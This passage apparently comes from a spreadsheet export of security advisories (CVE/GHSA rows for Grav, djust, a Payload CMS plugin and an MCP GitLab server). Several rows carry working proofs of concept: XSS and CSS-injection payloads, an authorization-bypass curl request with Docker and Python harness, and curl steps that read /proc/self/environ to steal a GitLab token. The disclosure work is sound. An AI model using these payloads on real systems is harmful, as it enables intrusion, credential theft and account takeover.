### Option B - Disallow `~` and `{% set %}` in sandboxed content (too restrictive)
Removing string concatenation or variable assignment from the sandbox would break legitimate use cases (e.g., building dynamic class names, assembling URLs).
### Option C - Block dynamic attribute names in Twig output
Parse the Twig output for HTML and check if any event handler attributes were dynamically constructed. This is complex but comprehensive.
### Option D - Escape HTML in rendered Twig output
Wrap the rendered output with `htmlspecialchars()` unless explicitly marked safe. This is the Twig default behavior — the `|raw` filter in theme templates bypasses it. Consider removing `|raw` from default themes and requiring explicit `|raw` only for trusted content.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61453</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61597</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M24" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, many djust built-in component template tags (`djust.components.templatetags.*`) render a developer/user-supplied URL into an `href` / `action` attribute, HTML-escaping it with `conditional_escape` but never validating the URL scheme. HTML escaping prevents attribute breakout but does not neutralize a `javascript:` URI (which needs no escapable characters), so a URL value of `javascript:alert(document.cookie)` lands verbatim in `&lt;a href="javascript:alert(document.cookie)"&gt;` and executes in the victim's session on click. Version 1.0.7 contains a fix. As a workaround, do not pass user-controllable URLs to the affected built-in component tags; pre-validate URL schemes in application code before binding them to component arguments.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61597</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>GHSA-373m-p57p-8665</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr">
        <is>
          <t>composer:getgrav/grav</t>
        </is>
      </c>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr"/>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-2c4f-86xc-cr74. This link is maintained to preserve external references.
### Original Description
Grav v2.0.0 contains a cross-site scripting vulnerability (fixed in 2.0.1). The XSS blueprint validator (Security::detectXss()) runs on raw page content before Twig processing. When Twig content processing is enabled (twig_content.process_enabled: true), an attacker with page-write API permission can use Twig's string concatenation operator (~) to dynamically construct event handler names, dangerous tag names, or dangerous protocols at render time (e.g. {% set x = "on" ~ "error" %}). The validator sees only the harmless Twig expression and allows the content, but after Twig rendering the output (rendered via {{ page.content|raw }}) contains an active payload such as &lt;img src=1 onerror=alert(1)&gt;, executing arbitrary JavaScript in visitors' browsers.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-373m-p57p-8665</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>GHSA-4wj4-79rr-pvff</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>composer:getgrav/grav</t>
        </is>
      </c>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr"/>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-ffmg-hfvg-jhg9. This link is maintained to preserve external references.
### Original Description
Grav before 2.0.0 (affected through 2.0.0-rc.9 and the 2.0 branch) contains a stored CSS injection vulnerability in the Markdown image resize() media action. Prior media hardening rejects direct ?style= payloads and unsafe attribute() fallbacks, but the resize() action in Excerpts::processMediaActions() writes caller-controlled values directly into the image's styleAttributes. A lower-privileged content editor who can edit page Markdown can store a crafted image URL with semicolon-delimited CSS declarations in the resize parameters, which are rendered into the final &lt;img style=...&gt; attribute when a higher-privileged reviewer/admin views the page or preview. This does not require JavaScript execution but enables UI redress/overlay and content-manipulation attacks (e.g., a full-viewport fixed overlay). Fixed in 2.0.0.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-4wj4-79rr-pvff</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58657</t>
        </is>
      </c>
      <c r="D27" s="5" t="inlineStr"/>
      <c r="E27" s="5" t="inlineStr"/>
      <c r="F27" s="5" t="inlineStr"/>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>composer:getgrav/grav</t>
        </is>
      </c>
      <c r="M27" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr"/>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>## Summary
Grav 2.0.0-rc.9 and the current 2.0 branch still allow stored CSS injection through Markdown image media actions. The prior media hardening rejects direct `?style=` payloads and unsafe `attribute()` fallbacks, but the adjacent `resize()` action still writes caller-controlled values directly into `styleAttributes`.
A publisher who can edit page Markdown can store a crafted image URL that renders additional CSS declarations in the final `&lt;img style=...&gt;` attribute. This crosses the same lower-privileged publisher to higher-privileged reviewer/admin rendered-content boundary as the earlier media style and attribute advisories.
## Impact
A lower-privileged content editor can persist CSS declarations that are rendered when a higher-privileged user views the page or admin preview. The demonstrated payload creates a full-viewport fixed overlay by injecting `position:fixed`, viewport dimensions, background color, and z-index declarations.
This does not require JavaScript execution. The impact is stored CSS injection in rendered content, with UI redress/overlay and content-manipulation risk in higher-privileged sessions.
## Reproduction
Tested versions:
- Grav 2.0 branch commit `6582166173bb8eb5869d96aea384e0e73777c94c`
- Grav `2.0.0-rc.9` commit `e03d29aa0d3ece16d73c1ffccfa78df8bf5f28b8`
Minimal Markdown payload:
```markdown
![logo](image.png?resize=100;position:fixed;top:0;left:0;width:100vw;height:100vh;background:white;z-index:9999,200)
```
A minimal PHPUnit-style reproducer can drive the same parser path directly:
```php
$m = new class {
    use \Grav\Common\Media\Traits\MediaObjectTrait;
    use \Grav\Common\Media\Traits\StaticResizeTrait;
    public function addMetaFile($filepath) {}
    public function __toString(): string { return ''; }
    public function url($reset = true) { return '/img.png'; }
    public function get($name, mixed $default = null, $separator = null) { return $default; }
    public function set($name, mixed $value, $separator = null) { return $this; }
    protected function createThumbnail($thumb) { return null; }
    protected function createLink(array $attributes) { return null; }
    protected function getItems(): array { return []; }
};
$excerpts = new \Grav\Common\Page\Markdown\Excerpts(null, ['markdown' =&gt; [], 'images' =&gt; []]);
$m = $excerpts-&gt;processMediaActions(
    $m,
    'image.png?resize=100;position:fixed;top:0;left:0;width:100vw;height:100vh;background:white;z-index:9999,200'
);
$element = $m-&gt;parsedownElement('', '', '', '', false);
var_dump($element['attributes']['style']);
```
Observed style attribute:
```text
width: 100;position:fixed;top:0;left:0;width:100vw;height:100vh;background:white;z-index:9999px;height: 200px;
```
The appended `px` lands on the final `z-index` value, but the preceding injected declarations remain syntactically valid CSS.
## Root Cause / Technical Details
`system/src/Grav/Common/Page/Markdown/Excerpts.php::processMediaActions()` parses the image query string into media actions and invokes the requested public media method with `call_user_func_array([$medium, $action['method']], $args)`.
For `resize()`, `system/src/Grav/Common/Media/Traits/StaticResizeTrait.php::resize()` stores width and height directly into style attributes:
```php
$this-&gt;styleAttributes['width'] = $width . 'px';
$this-&gt;styleAttributes['height'] = $height . 'px';
```
It does not verify that the values are numeric, length-only, or free of CSS declaration delimiters. Later, `system/src/Grav/Common/Media/Traits/MediaObjectTrait.php::parsedownElement()` serializes keyed style attributes as raw CSS declarations:
```php
$style .= $key . ': ' . $value . ';';
```
The sanitizer added for direct `style()` inputs is not reached for values introduced by `resize()`. As a result, `resize=100;position:fixed;...,200` breaks out of the intended `width:` value and injects additional declarations.
## PoC Evidence
On both current 2.0 and 2.0.0-rc.9, the targeted regression test produced the injected style string above. Existing tests still confirm the direct `style()` and `attribute()` paths are rejected; the bypass is specific to the adjacent `resize()` styleAttributes path.
## Remediation
Sanitize or type-normalize all values before they enter `styleAttributes`, not only values passed through `MediaObjectTrait::style()`. For `resize()`, cast or validate width and height as numeric values before appending `px`, or use a shared CSS declaration builder that rejects semicolons, colons, property names, and other declaration-breaking characters. Add regression coverage for `resize=100;position:fixed;top:0,200` and any other media action that writes to `styleAttributes` directly.</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58657</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59965</t>
        </is>
      </c>
      <c r="D28" s="5" t="inlineStr"/>
      <c r="E28" s="5" t="inlineStr"/>
      <c r="F28" s="5" t="inlineStr"/>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>npm:@jhb.software/payload-alt-text-plugin</t>
        </is>
      </c>
      <c r="M28" s="5" t="inlineStr">
        <is>
          <t>0.8.0</t>
        </is>
      </c>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr"/>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>## Alt Text Endpoint Authorization Bypass via Payload Local API `overrideAccess` Omission
### Summary
`@jhb.software/payload-alt-text-plugin` v0.7.0 exposes custom Payload CMS endpoints (`POST /api/alt-text-plugin/generate` and `/bulk`) that call the Payload Local API (`findByID` and `update`) without setting `overrideAccess: false`. Because Payload's internal logic evaluates `shouldOverrideAccess = overrideAccess !== false`, omitting the parameter causes it to default to `true`, silently bypassing all collection-level access control functions. Any authenticated user — regardless of role — can read and overwrite the `alt` and `keywords` fields of arbitrary upload documents that would otherwise be protected by restrictive collection access rules. The vulnerability is rated **High** (CVSS 7.1).
### Details
The plugin registers two network endpoints in `alt-text/src/plugin.ts:179-186`. Their default access guard (`plugin.ts:55`) only checks `!!req.user`, meaning any authenticated session satisfies the check regardless of the role required by the underlying collection.
The endpoint handler at `alt-text/src/endpoints/generateAltText.ts` accepts user-controlled `id`, `collection`, `locale`, and `update` fields from the request body (`line 29`), then passes them directly to two unsecured Local API calls:
**Read bypass** (`generateAltText.ts:31`):
```typescript
const imageDoc = await req.payload.findByID({
  id,
  collection,
  depth: 0,
  // overrideAccess: false is absent → defaults to true
})
```
**Write bypass** (`generateAltText.ts:121`):
```typescript
await req.payload.update({
  id,
  collection,
  data: {
    alt: result.result.altText,
    keywords: result.result.keywords,
  },
  locale: targetLocale,
  // overrideAccess: false is absent → defaults to true
})
```
The bulk endpoint (`alt-text/src/endpoints/bulkGenerateAltTexts.ts`) repeats the same pattern at lines `120` (read) and `170` (write).
Payload's internal resolution of `overrideAccess` is:
```
shouldOverrideAccess = overrideAccess !== false
// undefined !== false → true → collection access function is never called
```
Because the collection-level `read` and `update` access functions are never invoked, any attacker with a valid session can target documents in any upload collection, regardless of how that collection's access is configured.
### PoC
**Environment setup:**
1. Clone the repository and install `@jhb.software/payload-alt-text-plugin@0.7.0` into a Payload v3 project.
2. Configure an upload collection named `media` with `read` and `update` access restricted to users with `role: "admin"`.
3. Configure the plugin with `collections: ["media"]` and a resolver that returns `{ success: true, result: { altText: "PWNED_BY_EXPLOIT", keywords: ["hacked", "bypass"] } }`.
4. As an admin, create a media document (e.g., ID `doc-001`) with `alt = "original safe alt text"`.
5. Obtain a session token for a non-admin user (`role: "user"`).
**Build and run the dynamic PoC (Docker):**
```bash
# Build
docker build -t vuln001-poc -f vuln-001/Dockerfile .
# Run
docker run --rm vuln001-poc
```
**Exploit request:**
```bash
curl -i -b "payload-token=&lt;LOW_PRIV_TOKEN&gt;" \
  -H "Content-Type: application/json" \
  -X POST http://localhost:3000/api/alt-text-plugin/generate \
  --data '{"collection":"media","id":"doc-001","locale":"en","update":true}'
```
**Expected result:**
- HTTP 200 is returned.
- The response body contains `"altText": "PWNED_BY_EXPLOIT"`.
- A subsequent admin read of `media/doc-001` confirms `alt = "PWNED_BY_EXPLOIT"` and `keywords = ["hacked", "bypass"]`, despite the collection's update access being restricted to admins.
**Control verification (confirms the bypass is real, not a misconfiguration):**
A direct Local API call with `overrideAccess: false` by the same non-admin user throws `AccessError: update denied for collection "media" (user role: user)`, proving that the access rule is correct and the plugin endpoint is the vector.
**Dynamic reproduction output (Phase 2 confirmed):**
```
VULN-001: Alt Text endpoint authorization bypass
  Payload Local API overrideAccess omission in
  generateAltText.ts:31 and :121
[Step 1] Control: non-admin direct update with overrideAccess:false
  PASS: access correctly denied → AccessError
[Step 3] EXPLOIT: non-admin calls POST /api/alt-text-plugin/generate
  HTTP status : 200
  Response    : {"id":"doc-001","collection":"media","altText":"PWNED_BY_EXPLOIT","keywords":["hacked","bypass"]}
VULNERABILITY CONFIRMED — EXPLOITATION SUCCESSFUL
```
### Impact
This is an **Incorrect Authorization** vulnerability (CWE-863). The plugin's endpoints act as an authorization bypass tunnel into Payload's Local API. Any authenticated user — a subscriber, editor, or any low-privilege role — can:
1. **Read** the content of arbitrary upload documents that collection access rules would otherwise deny them.
2. **Overwrite** the `alt` text and `keywords` fields on those documents, effectively performing unauthorized content modification.
Operators who restrict upload collection access by role (a common production pattern) are fully impacted. Attackers do not need admin credentials; any valid session suffices. The vulnerability is exploitable on all default deployments where the plugin is enabled, with no special configuration required on the attacker's side.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001 dynamic reproduction
#
# Build context: the parent directory that contains both
#   repo/          (jhb-software/payload-plugins clone)
#   vuln-001/      (this workspace)
#
# Build:  docker build -t vuln001-poc -f vuln-001/Dockerfile .
# Run:    docker run --rm vuln001-poc
FROM node:22-slim
WORKDIR /app
# ---- Copy plugin source files required by the PoC ----
# Only the endpoint under test and its direct dependencies are needed.
# No Payload framework install required: we mock it in the PoC.
COPY repo/alt-text/src/endpoints/generateAltText.ts  ./plugin/src/endpoints/generateAltText.ts
COPY repo/alt-text/src/endpoints/schemas.ts          ./plugin/src/endpoints/schemas.ts
COPY repo/alt-text/src/utilities/mimeTypes.ts        ./plugin/src/utilities/mimeTypes.ts
COPY repo/alt-text/src/types/AltTextPluginConfig.ts  ./plugin/src/types/AltTextPluginConfig.ts
COPY repo/alt-text/src/resolvers/types.ts            ./plugin/src/resolvers/types.ts
# ---- Copy PoC files ----
COPY vuln-001/package_inner.json ./package.json
COPY vuln-001/inner_poc.ts       ./inner_poc.ts
# ---- Install minimal runtime dependencies ----
# zod: schema validation used by the endpoint handler
# tsx:  TypeScript executor that handles .js→.ts extension mapping
RUN npm install --no-audit --no-fund
# ---- Run the PoC ----
CMD ["node_modules/.bin/tsx", "inner_poc.ts"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
poc.py — VULN-001 Dynamic Reproduction Orchestrator
Vulnerability: @jhb.software/payload-alt-text-plugin v0.7.0
Title: Alt Text endpoint authorization bypass via Payload Local API overrideAccess omission
CWE: CWE-863 (Incorrect Authorization)
This script:
  1. Builds a Docker image containing the real plugin endpoint source.
  2. Runs the container, which calls the endpoint handler with a non-admin user.
  3. Captures stdout/stderr as evidence.
  4. Writes the result to phase2_result.json.
Usage:
  python3 poc.py
Safety:
  - All traffic stays on 127.0.0.1 / localhost inside Docker.
  - No external services are contacted.
  - No live credentials are used.
"""
import json
import os
import subprocess
import sys
# ---------------------------------------------------------------------------
# Paths
# ---------------------------------------------------------------------------
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
# Build context: parent directory that contains both repo/ and vuln-001/
BUILD_CONTEXT = os.path.dirname(THIS_DIR)
DOCKERFILE = os.path.join(THIS_DIR, "Dockerfile")
IMAGE_TAG = "vuln001-poc"
RESULT_FILE = os.path.join(THIS_DIR, "phase2_result.json")
BUILD_COMMAND = f"docker build -t {IMAGE_TAG} -f vuln-001/Dockerfile ."
RUN_COMMAND = f"docker run --rm {IMAGE_TAG}"
POC_COMMAND = f"python3 poc.py"
def run(cmd: list[str], cwd: str, timeout: int = 180) -&gt; tuple[int, str, str]:
    """Run a subprocess and return (returncode, stdout, stderr)."""
    result = subprocess.run(
        cmd,
        cwd=cwd,
        capture_output=True,
        text=True,
        timeout=timeout,
    )
    return result.returncode, result.stdout, result.stderr
def write_result(passed: bool, verdict: str, reason: str, evidence: str,
                 build_out: str = "", run_out: str = "", failure_detail: str = "") -&gt; None:
    """Write phase2_result.json."""
    data: dict = {
        "passed": passed,
        "verdict": verdict,
        "reason": reason,
        "build_command": BUILD_COMMAND,
        "run_command": RUN_COMMAND,
        "poc_command": POC_COMMAND,
        "evidence": evidence,
        "artifacts": ["Dockerfile", "poc.py"],
    }
    if failure_detail:
        data["failure_detail"] = failure_detail
    if build_out:
        data["build_output_tail"] = build_out[-2000:]
    if run_out:
        data["run_output"] = run_out
    with open(RESULT_FILE, "w", encoding="utf-8") as fh:
        json.dump(data, fh, indent=2, ensure_ascii=False)
    print(f"\nResult written to: {RESULT_FILE}")
def main() -&gt; int:
    # -----------------------------------------------------------------------
    # Step 1: Build the Docker image
    # -----------------------------------------------------------------------
    print("=" * 60)
    print("VULN-001 Dynamic Reproduction")
    print("=" * 60)
    print()
    print(f"[1/2] Building Docker image: {IMAGE_TAG}")
    print(f"      Context : {BUILD_CONTEXT}")
    print(f"      Command : {BUILD_COMMAND}")
    print()
    rc, build_stdout, build_stderr = run(
        ["docker", "build", "-t", IMAGE_TAG, "-f", "vuln-001/Dockerfile", "."],
        cwd=BUILD_CONTEXT,
    )
    combined_build = (build_stdout + build_stderr).strip()
    if rc != 0:
        print("ERROR: Docker build failed.")
        print(combined_build[-3000:])
        write_result(
            passed=False,
            verdict="FAIL",
            reason="Docker 빌드 실패 — npm install 또는 파일 복사 오류",
            evidence="",
            build_out=combined_build,
            failure_detail=f"docker build exit code {rc}:\n{combined_build[-2000:]}",
        )
        return 1
    print("      Build succeeded.")
    print()
    # -----------------------------------------------------------------------
    # Step 2: Run the PoC container
    # -----------------------------------------------------------------------
    print(f"[2/2] Running PoC container")
    print(f"      Command : {RUN_COMMAND}")
    print()
    rc, run_stdout, run_stderr = run(
        ["docker", "run", "--rm", IMAGE_TAG],
        cwd=BUILD_CONTEXT,
    )
    combined_run = (run_stdout + run_stderr).strip()
    print(combined_run)
    print()
    # -----------------------------------------------------------------------
    # Step 3: Evaluate the output
    # -----------------------------------------------------------------------
    success_marker = "VULNERABILITY CONFIRMED"
    pwned_marker = "PWNED_BY_EXPLOIT"
    if rc == 0 and success_marker in combined_run and pwned_marker in combined_run:
        # Extract the key evidence block
        lines = combined_run.splitlines()
        evidence_lines = []
        in_block = False
        for line in lines:
            if success_marker in line or pwned_marker in line or "EXPLOITATION" in line:
                in_block = True
            if in_block:
                evidence_lines.append(line)
            if in_block and line.startswith("→"):
                break
        evidence = "\n".join(evidence_lines) if evidence_lines else combined_run[-1500:]
        write_result(
            passed=True,
            verdict="PASS",
            reason=(
                "비관리자(role=user) 세션이 POST /api/alt-text-plugin/generate?update=true 호출을 통해 "
                "admin 전용 컬렉션의 문서 필드(alt, keywords)를 임의 수정하는 것을 실제 엔드포인트 코드 실행으로 확인. "
                "generateAltText.ts:121에서 payload.update()가 overrideAccess:false 없이 호출되어 "
                "Payload Local API의 기본 shouldOverrideAccess = undefined !== false → true 로직에 의해 "
                "컬렉션 레벨 access 함수가 우회됨. "
                "직접 update(overrideAccess:false) 호출은 AccessError로 차단되지만 플러그인 엔드포인트 경유 시 성공."
            ),
            evidence=evidence,
            run_out=combined_run,
        )
        print("PASS — vulnerability dynamically confirmed.")
        return 0
    else:
        print("FAIL — success marker not found or container exited non-zero.")
        write_result(
            passed=False,
            verdict="FAIL" if rc != 0 else "INCOMPLETE",
            reason=(
                f"컨테이너 종료 코드 {rc}. "
                "성공 마커(VULNERABILITY CONFIRMED)가 출력에서 발견되지 않음. "
                "로그를 확인하여 원인 파악 필요."
            ),
            evidence=combined_run[-2000:],
            run_out=combined_run,
            failure_detail=f"Container exit code: {rc}\nstdout+stderr:\n{combined_run}",
        )
        return 1
if __name__ == "__main__":
    sys.exit(main())
```</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59965</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61560</t>
        </is>
      </c>
      <c r="D29" s="5" t="inlineStr"/>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>npm:@zereight/mcp-gitlab</t>
        </is>
      </c>
      <c r="M29" s="5" t="inlineStr">
        <is>
          <t>2.1.27</t>
        </is>
      </c>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr"/>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>### Summary
The SSE transport mode (`SSE=true`) exposes all MCP tools without any authentication. The `upload_markdown` tool reads arbitrary files from the server's local filesystem via an unsanitized `file_path` parameter and uploads them to a GitLab project. Combined, any unauthenticated network-reachable attacker can read `/proc/self/environ` to steal the server's `GITLAB_PERSONAL_ACCESS_TOKEN` and achieve full GitLab account takeover. This is the default configuration for Docker deployments.
### Details
Two issues chain together:
**1. No authentication on SSE transport (`src/index.ts:7350-7388`)**
When `SSE=true` (the intended mode for Docker deployments per `docker-compose.yaml`), the `/sse` and `/messages` endpoints have zero authentication middleware. Any HTTP client that can reach the port can establish a session and invoke all ~100+ tools using the server's configured PAT.
```typescript
// src/index.ts:7354 — no auth check
app.get("/sse", async (_: Request, res: Response) =&gt; {
    const serverInstance = createServer();
    const transport = new SSEServerTransport("/messages", res);
    await serverInstance.connect(transport);
});
```
Remote Authorization (`REMOTE_AUTHORIZATION=true`) is explicitly incompatible with SSE mode (`src/index.ts:1833-1839`), so there is no way to add per-request auth in this transport.
**2. Arbitrary file read in `upload_markdown` (`src/index.ts:5461-5503`)**
The `upload_markdown` tool calls `fs.readFileSync(filePath)` where `filePath` comes directly from user input with no validation. The Zod schema (`src/schemas.ts:2150-2153`) defines `file_path` as `z.string()` with no path restrictions, allowlists, or sandboxing.
```typescript
async function markdownUpload(projectId: string, filePath: string) {
    if (!fs.existsSync(filePath)) {
        throw new Error(`File not found: ${filePath}`);
    }
    const fileBuffer = fs.readFileSync(filePath);  // Arbitrary file read — no path validation
    // ... uploads to GitLab project via POST /projects/:id/uploads
}
```
This tool is in the `users` toolset, which is **enabled by default**.
**Docker amplification:** The `Dockerfile` has no `USER` directive, so the process runs as root. The `docker-compose.yaml` maps `3002:3002`, which binds `0.0.0.0` by default, exposing the unauthenticated endpoint to the network.
### PoC
**Prerequisites:**
- A running `@zereight/mcp-gitlab` instance with `SSE=true` and `GITLAB_PERSONAL_ACCESS_TOKEN` set (this is the default Docker deployment config)
- Network access to the server's port (default: 3002)
- A GitLab project ID the PAT has write access to (use `list_projects` to enumerate)
**Steps:**
```bash
# 1. Connect to the unauthenticated SSE endpoint and capture the session ID
SESSION_ID=$(curl -s -N http://&lt;HOST&gt;:3002/sse | head -1 | grep -oP 'sessionId=\K[^&amp;\s]+')
# 2. (Optional) Enumerate accessible projects to find a writable project ID
curl -X POST "http://&lt;HOST&gt;:3002/messages?sessionId=$SESSION_ID" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
      "name": "list_projects",
      "arguments": {"owned": true}
    }
  }'
# 3. Read /proc/self/environ (contains GITLAB_PERSONAL_ACCESS_TOKEN in plaintext)
#    and upload it to a GitLab project
curl -X POST "http://&lt;HOST&gt;:3002/messages?sessionId=$SESSION_ID" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 2,
    "method": "tools/call",
    "params": {
      "name": "upload_markdown",
      "arguments": {
        "project_id": "&lt;WRITABLE_PROJECT_ID&gt;",
        "file_path": "/proc/self/environ"
      }
    }
  }'
# 4. The response contains a GitLab upload URL like:
#    {"markdown": "![environ](/uploads/abc123def456/environ)", "url": "/uploads/abc123def456/environ"}
#
# 5. Retrieve the uploaded file from GitLab:
curl "https://gitlab.example.com/&lt;namespace&gt;/&lt;project&gt;/uploads/abc123def456/environ"
# 6. The file contains NUL-separated environment variables including:
#    GITLAB_PERSONAL_ACCESS_TOKEN=glpat-xxxxxxxxxxxxxxxxxxxx
#
# 7. Use the stolen PAT for full GitLab API access:
curl -H "Private-Token: glpat-xxxxxxxxxxxxxxxxxxxx" "https://gitlab.example.com/api/v4/user"
```
